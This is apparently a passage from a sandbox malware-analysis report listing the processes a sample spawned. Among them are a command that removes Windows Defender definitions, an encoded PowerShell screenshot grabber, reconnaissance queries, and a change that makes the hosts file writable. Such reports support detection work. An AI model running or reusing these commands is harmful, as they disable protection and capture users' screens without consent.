                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:21
                                                                                                                                                                                                                                                    Start time:23:57:11
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                                    Imagebase:0x7ff650cc0000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:22
                                                                                                                                                                                                                                                    Start time:23:57:11
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:23
                                                                                                                                                                                                                                                    Start time:23:57:11
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d7c90000
                                                                                                                                                                                                                                                    File size:576'000 bytes
                                                                                                                                                                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:24
                                                                                                                                                                                                                                                    Start time:23:57:12
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
                                                                                                                                                                                                                                                    Imagebase:0x7ff650cc0000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:25
                                                                                                                                                                                                                                                    Start time:23:57:12
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:26
                                                                                                                                                                                                                                                    Start time:23:57:12
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:wmic path win32_VideoController get name
                                                                                                                                                                                                                                                    Imagebase:0x7ff6d7c90000
                                                                                                                                                                                                                                                    File size:576'000 bytes
                                                                                                                                                                                                                                                    MD5 hash:C37F2F4F4B3CD128BDABCAEB2266A785
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:28
                                                                                                                                                                                                                                                    Start time:23:57:16
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
                                                                                                                                                                                                                                                    Imagebase:0x7ff633b70000
                                                                                                                                                                                                                                                    File size:468'120 bytes
                                                                                                                                                                                                                                                    MD5 hash:B3676839B2EE96983F9ED735CD044159
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:29
                                                                                                                                                                                                                                                    Start time:23:57:16
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                    Imagebase:0x7ff650cc0000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:30
                                                                                                                                                                                                                                                    Start time:23:57:16
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                                                                                                                                                                                                                    Imagebase:0x7ff650cc0000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:31
                                                                                                                                                                                                                                                    Start time:23:57:16
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:32
                                                                                                                                                                                                                                                    Start time:23:57:16
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:33
                                                                                                                                                                                                                                                    Start time:23:57:16
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                                                                                                                                                                                                                                                    Imagebase:0x7ff650cc0000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:34
                                                                                                                                                                                                                                                    Start time:23:57:16
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                    Imagebase:0x7ff62a660000
                                                                                                                                                                                                                                                    File size:106'496 bytes
                                                                                                                                                                                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:35
                                                                                                                                                                                                                                                    Start time:23:57:16
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\tasklist.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:tasklist /FO LIST
                                                                                                                                                                                                                                                    Imagebase:0x7ff62a660000
                                                                                                                                                                                                                                                    File size:106'496 bytes
                                                                                                                                                                                                                                                    MD5 hash:D0A49A170E13D7F6AEBBEFED9DF88AAA
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:36
                                                                                                                                                                                                                                                    Start time:23:57:16
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                                                                                                                                                                                                                                                    Imagebase:0x7ff650cc0000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:37
                                                                                                                                                                                                                                                    Start time:23:57:16
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:38
                                                                                                                                                                                                                                                    Start time:23:57:16
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                    Imagebase:0x7ff7699e0000
                                                                                                                                                                                                                                                    File size:862'208 bytes
                                                                                                                                                                                                                                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:39
                                                                                                                                                                                                                                                    Start time:23:57:16
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\reg.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                                                                                                                                                                                                                                                    Imagebase:0x7ff6416e0000
                                                                                                                                                                                                                                                    File size:77'312 bytes
                                                                                                                                                                                                                                                    MD5 hash:227F63E1D9008B36BDBCC4B397780BE4
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:40
                                                                                                                                                                                                                                                    Start time:23:57:16
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                                                                                                                                                                                                                                    Imagebase:0x7ff788560000
                                                                                                                                                                                                                                                    File size:452'608 bytes
                                                                                                                                                                                                                                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:41
                                                                                                                                                                                                                                                    Start time:23:57:16
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                                                    Commandline:C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                                                                                                                                                                                                                                    Imagebase:0x7ff650cc0000
                                                                                                                                                                                                                                                    File size:289'792 bytes
                                                                                                                                                                                                                                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                                                    Target ID:42
                                                                                                                                                                                                                                                    Start time:23:57:16
                                                                                                                                                                                                                                                    Start date:20/12/2024
                                                                                                                                                                                                                                                    Path:C:\Windows\System32\conhost.exe
